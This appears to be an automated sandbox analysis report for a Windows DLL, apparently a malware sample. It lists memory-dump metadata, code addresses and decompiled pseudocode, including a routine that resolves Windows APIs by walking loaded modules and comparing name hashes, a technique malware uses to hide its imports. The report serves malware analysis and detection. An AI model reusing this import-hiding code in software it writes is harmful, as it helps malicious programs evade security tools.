                                                                                        0x100117e9
                                                                                        0x100117f0
                                                                                        0x100117f5
                                                                                        0x100117fe
                                                                                        0x10011803
                                                                                        0x10011805
                                                                                        0x10011809
                                                                                        0x1001180d
                                                                                        0x1001181a
                                                                                        0x10011827
                                                                                        0x1001182b
                                                                                        0x1001183f
                                                                                        0x10011843
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011858
                                                                                        0x1001185a
                                                                                        0x10011862
                                                                                        0x1001185f
                                                                                        0x1001185f
                                                                                        0x1001185f
                                                                                        0x10011866
                                                                                        0x10011868
                                                                                        0x1001186e
                                                                                        0x10011874
                                                                                        0x100118d0
                                                                                        0x100118d9
                                                                                        0x100118dd
                                                                                        0x100118ea
                                                                                        0x100118f3
                                                                                        0x100118f8
                                                                                        0x100118fc
                                                                                        0x100118ff
                                                                                        0x10011960
                                                                                        0x10011976
                                                                                        0x10011981
                                                                                        0x10011982
                                                                                        0x10011983
                                                                                        0x10011987
                                                                                        0x1001198a
                                                                                        0x10011c0a
                                                                                        0x10011c0d
                                                                                        0x10011c0d
                                                                                        0x00000000
                                                                                        0x1001198a
                                                                                        0x10011909
                                                                                        0x10011919
                                                                                        0x10011922
                                                                                        0x1001192b
                                                                                        0x10011934
                                                                                        0x10011935
                                                                                        0x10011936
                                                                                        0x1001193b
                                                                                        0x10011943
                                                                                        0x1001194b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x1001194d
                                                                                        0x1001187d
                                                                                        0x10011882
                                                                                        0x10011886
                                                                                        0x10011886
                                                                                        0x1001188a
                                                                                        0x1001188d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100118ae
                                                                                        0x100118b0
                                                                                        0x100118b4
                                                                                        0x100118b6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x100118b8
                                                                                        0x100118bf
                                                                                        0x100118cb
                                                                                        0x00000000
                                                                                        0x100118cb
                                                                                        0x10011892
                                                                                        0x00000000
                                                                                        0x10011990
                                                                                        0x10011990
                                                                                        0x10011991
                                                                                        0x100119a1
                                                                                        0x100119ad
                                                                                        0x100119b6
                                                                                        0x100119bf
                                                                                        0x100119c8
                                                                                        0x00000000
                                                                                        0x100119c8
                                                                                        0x10011677
                                                                                        0x10011679
                                                                                        0x1001167b
                                                                                        0x10011680
                                                                                        0x10011685
                                                                                        0x10011698
                                                                                        0x100116ae
                                                                                        0x100116b7
                                                                                        0x100116b8
                                                                                        0x100116b8
                                                                                        0x100116ba
                                                                                        0x100116bb
                                                                                        0x100116be
                                                                                        0x100116c2
                                                                                        0x00000000
                                                                                        0x1001167b
                                                                                        0x10011617
                                                                                        0x10011621
                                                                                        0x10011622
                                                                                        0x10011622
                                                                                        0x1001162f
                                                                                        0x1001163b
                                                                                        0x1001163d
                                                                                        0x1001163f
                                                                                        0x10011643
                                                                                        0x10011653
                                                                                        0x10011653
                                                                                        0x1001165a
                                                                                        0x1001165d
                                                                                        0x1001165e
                                                                                        0x10011662
                                                                                        0x1001166c
                                                                                        0x00000000
                                                                                        0x1001166c

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000002.00000002.749011351.0000000010000000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749036684.000000001001A000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749045623.000000001001D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749056111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 00e8384ffa14b801263d212529f2591a69cc8472f4cb423af8516be247f5c620
                                                                                        • Instruction ID: b1410cd0d196bac93b6c766087412172e782a524cb2907c5cacc11c56020be0d
                                                                                        • Opcode Fuzzy Hash: 00e8384ffa14b801263d212529f2591a69cc8472f4cb423af8516be247f5c620
                                                                                        • Instruction Fuzzy Hash: 99327C745083418FD718DF28C881AAFB7E5FF94384F10892DF5958B2A6EB70E985CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 89%
                                                                                        			E10011D58(intOrPtr __eax) {
                                                                                        				void* _t72;
                                                                                        				intOrPtr _t74;
                                                                                        				signed int _t75;
                                                                                        				signed int _t76;
                                                                                        				signed char _t84;
                                                                                        				signed char _t86;
                                                                                        				signed char _t89;
                                                                                        				signed char _t92;
                                                                                        				signed char _t95;
                                                                                        				signed char* _t99;
                                                                                        				void* _t113;
                                                                                        				signed char _t114;
                                                                                        				signed char _t116;
                                                                                        				signed char _t118;
                                                                                        				intOrPtr _t119;
                                                                                        				signed char _t120;
                                                                                        				signed char _t127;
                                                                                        				signed char _t129;
                                                                                        				signed char _t130;
                                                                                        				signed char _t143;
                                                                                        				signed char _t145;
                                                                                        				signed char _t146;
                                                                                        				signed int _t147;
                                                                                        				signed char _t148;
                                                                                        				void* _t151;
                                                                                        				signed char _t155;
                                                                                        				signed char _t159;
                                                                                        				signed char _t165;
                                                                                        				signed char _t166;
                                                                                        				signed char _t167;
                                                                                        				signed char _t168;
                                                                                        				void* _t170;
                                                                                        				void* _t171;
                                                                                        				intOrPtr _t172;
                                                                                        				signed char _t173;
                                                                                        				intOrPtr _t174;
                                                                                        				intOrPtr* _t175;
                                                                                        				signed char _t176;
                                                                                        				signed char _t177;
                                                                                        				signed char _t178;
                                                                                        				signed char _t179;
                                                                                        				signed char* _t181;
                                                                                        
                                                                                        				_t119 = __eax;
                                                                                        				_t143 =  *0x1001d21c; // 0x76470dcb
                                                                                        				if(_t143 == 0x76470dcb) {
                                                                                        					_t143 = 0;
                                                                                        					 *0x1001d21c = 0;
                                                                                        				}
                                                                                        				if(_t119 != 0xfe338407) {
                                                                                        					L4:
                                                                                        					_t174 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                        					if(_t119 != 0xa7e21d79) {
                                                                                        						while(1) {
                                                                                        							L10:
                                                                                        							__eflags = _t143;
                                                                                        							if(_t143 == 0) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_t72 = 0;
                                                                                        							_t120 = 0;
                                                                                        							__eflags = 0;
                                                                                        							while(1) {
                                                                                        								__eflags = _t119 -  *((intOrPtr*)(_t120 + _t143 + 8));
                                                                                        								if(_t119 ==  *((intOrPtr*)(_t120 + _t143 + 8))) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t72 = _t72 + 1;
                                                                                        								_t120 = _t120 + 0x10;
                                                                                        								__eflags = _t72 - 0x10;
                                                                                        								if(_t72 < 0x10) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								_t143 =  *(_t143 + 0x100);
                                                                                        								goto L10;
                                                                                        							}
                                                                                        							return  *((intOrPtr*)(_t120 + _t143 + 0xc));
                                                                                        						}
                                                                                        						__eflags = _t119 - 0x94e21d79;
                                                                                        						if(_t119 != 0x94e21d79) {
                                                                                        							_t74 =  *((intOrPtr*)(_t174 + 0xc));
                                                                                        							_t175 =  *((intOrPtr*)(_t74 + 0xc));
                                                                                        							_t181[4] =  *(_t74 + 0x10);
                                                                                        							while(1) {
                                                                                        								_t172 =  *((intOrPtr*)(_t175 + 0x30));
                                                                                        								_t75 = 0;
                                                                                        								__eflags = 0;
                                                                                        								while(1) {
                                                                                        									_t145 =  *(_t172 + _t75 * 2) & 0x0000ffff;
                                                                                        									_t181[0x1c + _t75 * 2] = _t145;
                                                                                        									__eflags = _t145;
                                                                                        									_t146 =  *(_t175 + 0x2c) & 0x0000ffff;
                                                                                        									if(_t145 == 0) {
                                                                                        										break;
                                                                                        									}
                                                                                        									_t75 = _t75 + 1;
                                                                                        									__eflags = _t75 - _t146;
                                                                                        									if(_t75 <= _t146) {
                                                                                        										continue;
                                                                                        									}
                                                                                        									break;
                                                                                        								}
                                                                                        								__eflags = _t146;
                                                                                        								_t147 = 0;
                                                                                        								if(_t146 <= 0) {
                                                                                        									L34:
                                                                                        									_t76 = E10014FD4( &(_t181[0x13c]), _t147);
                                                                                        									__eflags = _t119 - (_t76 ^ 0x7af3da47);
                                                                                        									if(_t119 == (_t76 ^ 0x7af3da47)) {
                                                                                        										_t173 =  *(_t175 + 0x18);
                                                                                        										__eflags = _t173;
                                                                                        										if(_t173 == 0) {
                                                                                        											L55:
                                                                                        											return _t173;
                                                                                        										}
                                                                                        										L38:
                                                                                        										_t148 =  *0x1001d2ec; // 0x0
                                                                                        										__eflags = _t148 |  *0x1001d2ed;
                                                                                        										if((_t148 |  *0x1001d2ed) == 0) {
                                                                                        											_t176 =  *0x1001d21c; // 0x76470dcb
                                                                                        											__eflags = _t176;
                                                                                        											if(_t176 == 0) {
                                                                                        												 *0x1001d2ec = 1;
                                                                                        												_t177 = E100135F4(0x104);
                                                                                        												__eflags = _t177;
                                                                                        												if(_t177 == 0) {
                                                                                        													_t177 = 0;
                                                                                        													__eflags = 0;
                                                                                        													L62:
                                                                                        													 *0x1001d21c = _t177;
                                                                                        													 *0x1001d214 = E10013044(0xfe338407, 0xb0386671, 0xfe338407, 0xfe338407);
                                                                                        													 *0x1001d2ec = 0;
                                                                                        													L45:
                                                                                        													_t151 = 0;
                                                                                        													_t165 = 0;
                                                                                        													__eflags = 0;
                                                                                        													while(1) {
                                                                                        														__eflags =  *(_t165 + _t177 + 8);
                                                                                        														if( *(_t165 + _t177 + 8) == 0) {
                                                                                        															break;
                                                                                        														}
                                                                                        														_t151 = _t151 + 1;
                                                                                        														_t165 = _t165 + 0x10;
                                                                                        														__eflags = _t151 - 0x10;
                                                                                        														if(_t151 < 0x10) {
                                                                                        															continue;
                                                                                        														}
                                                                                        														_t84 = E100135F4(0x104);
                                                                                        														_t181[4] = _t84;
                                                                                        														__eflags =  *_t181;
                                                                                        														if( *_t181 == 0) {
                                                                                        															 *_t181 = 0;
                                                                                        															L53:
                                                                                        															 *( *_t181 + 0xc) = _t173;
                                                                                        															E1000D03C( *_t181,  &(_t181[0x1c]));
                                                                                        															_t155 =  *_t181;
                                                                                        															 *((intOrPtr*)(_t155 + 8)) = _t119;
                                                                                        															 *(_t177 + 0x100) = _t155;
                                                                                        															goto L55;
                                                                                        														}
                                                                                        														_t167 = _t84;
                                                                                        														_t86 = 0x10;
                                                                                        														do {
                                                                                        															_t181[0x13c] = _t86;
                                                                                        															E1000CFC8(_t167, 0);
                                                                                        															 *((intOrPtr*)(_t167 + 8)) = 0;
                                                                                        															 *((intOrPtr*)(_t167 + 0xc)) = 0;
                                                                                        															_t167 = _t167 + 0x10;
                                                                                        															_t86 = _t181[0x138] - 1;
                                                                                        															__eflags = _t86;
                                                                                        														} while (_t86 != 0);
                                                                                        														 *( *_t181 + 0x100) = 0;
                                                                                        														goto L53;
                                                                                        													}
                                                                                        													_t166 = _t165 + _t177;
                                                                                        													__eflags = _t166;
                                                                                        													 *(_t166 + 0xc) = _t173;
                                                                                        													E1000D03C(_t166,  &(_t181[0x1c]));
                                                                                        													 *((intOrPtr*)(_t166 + 8)) = _t119;
                                                                                        													goto L55;
                                                                                        												}
                                                                                        												_t168 = _t177;
                                                                                        												_t89 = 0x10;
                                                                                        												do {
                                                                                        													_t181[4] = _t89;
                                                                                        													E1000CFC8(_t168, 0);
                                                                                        													 *((intOrPtr*)(_t168 + 8)) = 0;
                                                                                        													 *((intOrPtr*)(_t168 + 0xc)) = 0;
                                                                                        													_t168 = _t168 + 0x10;
                                                                                        													_t89 =  *_t181 - 1;
                                                                                        													__eflags = _t89;
                                                                                        												} while (_t89 != 0);
                                                                                        												 *(_t177 + 0x100) = 0;
                                                                                        												goto L62;
                                                                                        											}
                                                                                        											_t159 =  *(_t176 + 0x100);
                                                                                        											while(1) {
                                                                                        												__eflags = _t159;
                                                                                        												if(_t159 == 0) {
                                                                                        													goto L45;
                                                                                        												}
                                                                                        												_t177 = _t159;
                                                                                        												_t159 =  *(_t159 + 0x100);
                                                                                        											}
                                                                                        											goto L45;
                                                                                        										}
                                                                                        										__eflags = _t119 - 0xfe338407;
                                                                                        										if(_t119 == 0xfe338407) {
                                                                                        											 *0x1001d220 = _t173;
                                                                                        										}
                                                                                        										goto L55;
                                                                                        									}
                                                                                        									__eflags = _t175 - _t181[4];
                                                                                        									if(_t175 != _t181[4]) {
                                                                                        										_t175 =  *_t175;
                                                                                        										continue;
                                                                                        									}
                                                                                        									L36:
                                                                                        									_t173 = 0;
                                                                                        									goto L55;
                                                                                        								}
                                                                                        								_t92 = 0;
                                                                                        								__eflags = 0;
                                                                                        								while(1) {
                                                                                        									_t126 =  *((char*)(_t172 + _t147 * 2));
                                                                                        									 *_t181 = _t92;
                                                                                        									_t39 = _t126 - 0x41; // -81
                                                                                        									__eflags = _t39 - 0x19;
                                                                                        									_t40 = _t126 + 0x20; // 0x10
                                                                                        									_t127 =  <=  ? _t40 :  *((char*)(_t172 + _t147 * 2));
                                                                                        									_t181[_t147 + 0x13c] = _t127;
                                                                                        									_t95 =  *_t181;
                                                                                        									__eflags = _t127;
                                                                                        									if(_t127 == 0) {
                                                                                        										goto L34;
                                                                                        									}
                                                                                        									_t92 = _t95 + 1;
                                                                                        									_t147 = _t147 + 1;
                                                                                        									__eflags = _t92 - ( *(_t175 + 0x2c) & 0x0000ffff);
                                                                                        									if(_t92 < ( *(_t175 + 0x2c) & 0x0000ffff)) {
                                                                                        										continue;
                                                                                        									}
                                                                                        									goto L34;
                                                                                        								}
                                                                                        								goto L34;
                                                                                        							}
                                                                                        						}
                                                                                        						_t170 = E10019A00();
                                                                                        						_t178 = 0;
                                                                                        						while(1) {
                                                                                        							_t129 = E10013044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
                                                                                        							__eflags = _t129;
                                                                                        							if(_t129 == 0) {
                                                                                        								goto L16;
                                                                                        							}
                                                                                        							_t116 =  *_t129(0xffffffff, _t178, 0,  &(_t181[0x11c]), 0x1c, 0);
                                                                                        							__eflags = _t116;
                                                                                        							if(_t116 != 0) {
                                                                                        								goto L36;
                                                                                        							}
                                                                                        							L16:
                                                                                        							_t99 =  &(_t181[0x120]);
                                                                                        							_t173 =  *_t99;
                                                                                        							_t130 = _t99[8];
                                                                                        							__eflags = _t173 - _t170;
                                                                                        							if(_t173 > _t170) {
                                                                                        								L13:
                                                                                        								_t178 = _t178 + _t130;
                                                                                        								__eflags = _t178;
                                                                                        								continue;
                                                                                        							}
                                                                                        							__eflags = _t130 + _t173 - _t170;
                                                                                        							if(_t130 + _t173 <= _t170) {
                                                                                        								goto L13;
                                                                                        							}
                                                                                        							__eflags = _t173;
                                                                                        							if(_t173 == 0) {
                                                                                        								goto L55;
                                                                                        							}
                                                                                        							E1000F5A8( &(_t181[0x10]), 0x400);
                                                                                        							_t171 = E1000F4E0( &(_t181[0x10]), 0);
                                                                                        							_t179 = E10013044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
                                                                                        							__eflags = _t179;
                                                                                        							if(_t179 == 0) {
                                                                                        								L21:
                                                                                        								E1000D000( &(_t181[0xc]),  *((intOrPtr*)(_t171 + 4)), 0);
                                                                                        								__eflags = E1000D210( &(_t181[8]), 0x5c);
                                                                                        								if(__eflags != 0) {
                                                                                        									_push(0x5c);
                                                                                        									E1000D650( &(_t181[0xc]), __eflags,  &(_t181[0x1bc]));
                                                                                        									E1000D03C( &(_t181[8]), _t181[0x1bc]);
                                                                                        									E1000D020( &(_t181[0x1bc]));
                                                                                        								}
                                                                                        								E1000DE70( &(_t181[0x20]), _t181[4], 0);
                                                                                        								E1000D020( &(_t181[4]));
                                                                                        								L24:
                                                                                        								E1000F678( &(_t181[0xc]));
                                                                                        								goto L38;
                                                                                        							}
                                                                                        							 *_t181 = E1000F4E0( &(_t181[0x10]), 0);
                                                                                        							_t113 = E1000F4F0( &(_t181[0xc]));
                                                                                        							_t114 =  *_t179(0xffffffff, _t173, 2, _t181[8], _t113, 0);
                                                                                        							__eflags = _t114;
                                                                                        							if(_t114 != 0) {
                                                                                        								goto L24;
                                                                                        							}
                                                                                        							goto L21;
                                                                                        						}
                                                                                        					}
                                                                                        					return  *((intOrPtr*)(_t174 + 8));
                                                                                        				} else {
                                                                                        					_t118 =  *0x1001d220; // 0xe86b6198
                                                                                        					if(_t118 != 0xe86b6198) {
                                                                                        						return _t118;
                                                                                        					}
                                                                                        					goto L4;
                                                                                        				}
                                                                                        			}













































                                                                                        0x10011d62
                                                                                        0x10011d64
                                                                                        0x10011d70
                                                                                        0x10011d72
                                                                                        0x10011d74
                                                                                        0x10011d74
                                                                                        0x10011d80
                                                                                        0x10011d92
                                                                                        0x10011d98
                                                                                        0x10011da1
                                                                                        0x10011dc8
                                                                                        0x10011dc8
                                                                                        0x10011dc8
                                                                                        0x10011dca
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011dab
                                                                                        0x10011dad
                                                                                        0x10011dad
                                                                                        0x10011daf
                                                                                        0x10011daf
                                                                                        0x10011db3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011db9
                                                                                        0x10011dba
                                                                                        0x10011dbd
                                                                                        0x10011dc0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011dc2
                                                                                        0x00000000
                                                                                        0x10011dc2
                                                                                        0x00000000
                                                                                        0x100120f1
                                                                                        0x10011dcc
                                                                                        0x10011dd2
                                                                                        0x10011efe
                                                                                        0x10011f04
                                                                                        0x10011f07
                                                                                        0x10011f10
                                                                                        0x10011f10
                                                                                        0x10011f13
                                                                                        0x10011f13
                                                                                        0x10011f15
                                                                                        0x10011f15
                                                                                        0x10011f19
                                                                                        0x10011f1e
                                                                                        0x10011f20
                                                                                        0x10011f24
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011f26
                                                                                        0x10011f27
                                                                                        0x10011f29
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011f29
                                                                                        0x10011f2b
                                                                                        0x10011f2f
                                                                                        0x10011f30
                                                                                        0x10011f62
                                                                                        0x10011f69
                                                                                        0x10011f73
                                                                                        0x10011f75
                                                                                        0x10011f84
                                                                                        0x10011f87
                                                                                        0x10011f89
                                                                                        0x10012071
                                                                                        0x00000000
                                                                                        0x10012071
                                                                                        0x10011f8f
                                                                                        0x10011f8f
                                                                                        0x10011f95
                                                                                        0x10011f9b
                                                                                        0x10011fb4
                                                                                        0x10011fba
                                                                                        0x10011fbc
                                                                                        0x10012085
                                                                                        0x10012091
                                                                                        0x10012094
                                                                                        0x10012096
                                                                                        0x100120c7
                                                                                        0x100120c7
                                                                                        0x100120c9
                                                                                        0x100120d5
                                                                                        0x100120e0
                                                                                        0x100120e5
                                                                                        0x10011fd6
                                                                                        0x10011fd6
                                                                                        0x10011fd8
                                                                                        0x10011fd8
                                                                                        0x10011fda
                                                                                        0x10011fda
                                                                                        0x10011fdf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011fe1
                                                                                        0x10011fe2
                                                                                        0x10011fe5
                                                                                        0x10011fe8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011fef
                                                                                        0x10011ff4
                                                                                        0x10011ff9
                                                                                        0x10011ffd
                                                                                        0x10012038
                                                                                        0x1001203f
                                                                                        0x10012047
                                                                                        0x1001204a
                                                                                        0x1001204f
                                                                                        0x10012052
                                                                                        0x10012055
                                                                                        0x00000000
                                                                                        0x10012055
                                                                                        0x10011fff
                                                                                        0x10012003
                                                                                        0x10012004
                                                                                        0x10012008
                                                                                        0x1001200f
                                                                                        0x1001201d
                                                                                        0x10012020
                                                                                        0x10012023
                                                                                        0x10012026
                                                                                        0x10012026
                                                                                        0x10012026
                                                                                        0x1001202c
                                                                                        0x00000000
                                                                                        0x1001202c
                                                                                        0x1001205d
                                                                                        0x1001205d
                                                                                        0x10012066
                                                                                        0x10012069
                                                                                        0x1001206e
                                                                                        0x00000000
                                                                                        0x1001206e
                                                                                        0x10012098
                                                                                        0x1001209c
                                                                                        0x1001209d
                                                                                        0x100120a1
                                                                                        0x100120a5
                                                                                        0x100120af
                                                                                        0x100120b2
                                                                                        0x100120b5
                                                                                        0x100120b8
                                                                                        0x100120b8
                                                                                        0x100120b8
                                                                                        0x100120bb
                                                                                        0x00000000
                                                                                        0x100120bb
                                                                                        0x10011fc2
                                                                                        0x10011fd2
                                                                                        0x10011fd2
                                                                                        0x10011fd4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011fca
                                                                                        0x10011fcc
                                                                                        0x10011fcc
                                                                                        0x00000000
                                                                                        0x10011fd2
                                                                                        0x10011f9d
                                                                                        0x10011fa3
                                                                                        0x10011fa9
                                                                                        0x10011fa9
                                                                                        0x00000000
                                                                                        0x10011fa3
                                                                                        0x10011f77
                                                                                        0x10011f7b
                                                                                        0x10011f0d
                                                                                        0x00000000
                                                                                        0x10011f0d
                                                                                        0x10011f7d
                                                                                        0x10011f7d
                                                                                        0x00000000
                                                                                        0x10011f7d
                                                                                        0x10011f32
                                                                                        0x10011f32
                                                                                        0x10011f34
                                                                                        0x10011f34
                                                                                        0x10011f38
                                                                                        0x10011f3b
                                                                                        0x10011f3e
                                                                                        0x10011f41
                                                                                        0x10011f47
                                                                                        0x10011f4a
                                                                                        0x10011f51
                                                                                        0x10011f54
                                                                                        0x10011f56
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011f58
                                                                                        0x10011f59
                                                                                        0x10011f5e
                                                                                        0x10011f60
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011f60
                                                                                        0x00000000
                                                                                        0x10011f34
                                                                                        0x10011f10
                                                                                        0x10011ddd
                                                                                        0x10011ddf
                                                                                        0x10011de5
                                                                                        0x10011df6
                                                                                        0x10011df8
                                                                                        0x10011dfa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011e0d
                                                                                        0x10011e0f
                                                                                        0x10011e11
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011e17
                                                                                        0x10011e17
                                                                                        0x10011e1e
                                                                                        0x10011e20
                                                                                        0x10011e23
                                                                                        0x10011e25
                                                                                        0x10011de3
                                                                                        0x10011de3
                                                                                        0x10011de3
                                                                                        0x00000000
                                                                                        0x10011de3
                                                                                        0x10011e2a
                                                                                        0x10011e2c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011e2e
                                                                                        0x10011e30
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011e3f
                                                                                        0x10011e4f
                                                                                        0x10011e62
                                                                                        0x10011e64
                                                                                        0x10011e66
                                                                                        0x10011e91
                                                                                        0x10011e9a
                                                                                        0x10011eaa
                                                                                        0x10011eac
                                                                                        0x10011eb5
                                                                                        0x10011ebc
                                                                                        0x10011ecc
                                                                                        0x10011ed3
                                                                                        0x10011ed3
                                                                                        0x10011ee2
                                                                                        0x10011eeb
                                                                                        0x10011ef0
                                                                                        0x10011ef4
                                                                                        0x00000000
                                                                                        0x10011ef4
                                                                                        0x10011e73
                                                                                        0x10011e7a
                                                                                        0x10011e8b
                                                                                        0x10011e8d
                                                                                        0x10011e8f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10011e8f
                                                                                        0x10011de5
                                                                                        0x00000000
                                                                                        0x10011d82
                                                                                        0x10011d82
                                                                                        0x10011d8c
                                                                                        0x1001207d
                                                                                        0x1001207d
                                                                                        0x00000000
                                                                                        0x10011d8c

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000002.00000002.749011351.0000000010000000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749036684.000000001001A000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749045623.000000001001D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749056111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72016a32b2d06ddbdaccdb2b1081277c7643a152986143180660b39393415af5
                                                                                        • Instruction ID: 5609b69e05a1b06f5233c8e7297c4b8c04bd3945fb3a39e2e71c43012004eafc
                                                                                        • Opcode Fuzzy Hash: 72016a32b2d06ddbdaccdb2b1081277c7643a152986143180660b39393415af5
                                                                                        • Instruction Fuzzy Hash: 53A1E7746043459BE714EF15C880BAEB3E6FF94340F21CA2DE9948F296D771E982CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E10006D50() {
                                                                                        
                                                                                        				 *0x1001d280 = GetUserNameW;
                                                                                        				 *0x1001D284 = MessageBoxW;
                                                                                        				 *0x1001D288 = GetLastError;
                                                                                        				 *0x1001D28C = CreateFileA;
                                                                                        				 *0x1001D290 = DebugBreak;
                                                                                        				 *0x1001D294 = FlushFileBuffers;
                                                                                        				 *0x1001D298 = FreeEnvironmentStringsA;
                                                                                        				 *0x1001D29C = GetConsoleOutputCP;
                                                                                        				 *0x1001D2A0 = GetEnvironmentStrings;
                                                                                        				 *0x1001D2A4 = GetLocaleInfoA;
                                                                                        				 *0x1001D2A8 = GetStartupInfoA;
                                                                                        				 *0x1001D2AC = GetStringTypeA;
                                                                                        				 *0x1001D2B0 = HeapValidate;
                                                                                        				 *0x1001D2B4 = IsBadReadPtr;
                                                                                        				 *0x1001D2B8 = LCMapStringA;
                                                                                        				 *0x1001D2BC = LoadLibraryA;
                                                                                        				 *0x1001D2C0 = OutputDebugStringA;
                                                                                        				return 0x1001d280;
                                                                                        			}



                                                                                        0x10006d61
                                                                                        0x10006d69
                                                                                        0x10006d6c
                                                                                        0x10006d7b
                                                                                        0x10006d7e
                                                                                        0x10006d8d
                                                                                        0x10006d90
                                                                                        0x10006d9f
                                                                                        0x10006da2
                                                                                        0x10006db1
                                                                                        0x10006db4
                                                                                        0x10006dc3
                                                                                        0x10006dc6
                                                                                        0x10006dd5
                                                                                        0x10006dd8
                                                                                        0x10006de7
                                                                                        0x10006dea
                                                                                        0x10006ded

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.749018753.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000002.00000002.749011351.0000000010000000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749036684.000000001001A000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749045623.000000001001D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000002.00000002.749056111.000000001001F000.00000002.00020000.sdmp Download File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
                                                                                        • Instruction ID: 9a9f90be372116ce35b3bf57ca6adafecb814b37ff7dc50591bd4b03753dcc6b
                                                                                        • Opcode Fuzzy Hash: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
                                                                                        • Instruction Fuzzy Hash: 99110FB8A05620CFD34ACF09D5D49117BF2BB8E360312C19AD8098B376D734D985CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 83%
                                                                                        			E1000C218(void* __ecx, void* __edx) {
                                                                                        				char _v28;
                                                                                        				char _v33;
                                                                                        				char _v38;
                                                                                        				char _v43;
                                                                                        				void* _t24;
                                                                                        				char* _t25;
                                                                                        				char _t32;
                                                                                        				void* _t33;
                                                                                        				void* _t34;
                                                                                        				signed int _t38;
                                                                                        				char* _t40;
                                                                                        
                                                                                        				_t40 = (_t38 & 0xfffffff0) - 0x2c;
                                                                                        				asm("movq xmm0, [edx]");
                                                                                        				_t32 = 0;
                                                                                        				 *_t40 = 0x7b;
                                                                                        				asm("movq [esp+0x1], xmm0");
                                                                                        				_v43 = 0x2d;
                                                                                        				do {
                                                                                        					 *((char*)(_t40 + _t32 + 0xa)) =  *((intOrPtr*)(_t32 + __edx + 8));
                                                                                        					_t32 = _t32 + 1;
                                                                                        				} while (_t32 < 4);
                                                                                        				_v38 = 0x2d;
                                                                                        				_t33 = 0;
                                                                                        				do {
                                                                                        					 *((char*)(_t40 + _t33 + 0xf)) =  *((intOrPtr*)(_t33 + __edx + 0xc));
                                                                                        					_t33 = _t33 + 1;
                                                                                        				} while (_t33 < 4);
                                                                                        				_v33 = 0x2d;
                                                                                        				_t34 = 0;
                                                                                        				do {
                                                                                        					 *((char*)(_t40 + _t34 + 0x14)) =  *((intOrPtr*)(_t34 + __edx + 0x10));
                                                                                        					_t34 = _t34 + 1;
                                                                                        				} while (_t34 < 4);
                                                                                        				_v28 = 0x2d;
                                                                                        				_t24 = 0;
                                                                                        				do {
                                                                                        					asm("movd xmm0, dword [eax+edx+0x14]");
                                                                                        					asm("movd [esp+eax+0x19], xmm0");
                                                                                        					_t24 = _t24 + 4;
                                                                                        				} while (_t24 < 0xc);
                                                                                        				_t25 = _t40;
                                                                                        				 *((char*)(_t25 + 0x25)) = 0x7d;
                                                                                        				 *((char*)(_t25 + 0x26)) = 0;
                                                                                        				E1000DFBC(__ecx, _t25, 0);
                                                                                        				return __ecx;
                                                                                        			}














                                                                                        0x1000c21f
                                                                                        0x1000c224
                                                                                        0x1000c228
                                                                                        0x1000c22a
                                                                                        0x1000c22e
                                                                                        0x1000c234
                                                                                        0x1000c239
                                                                                        0x1000c23d
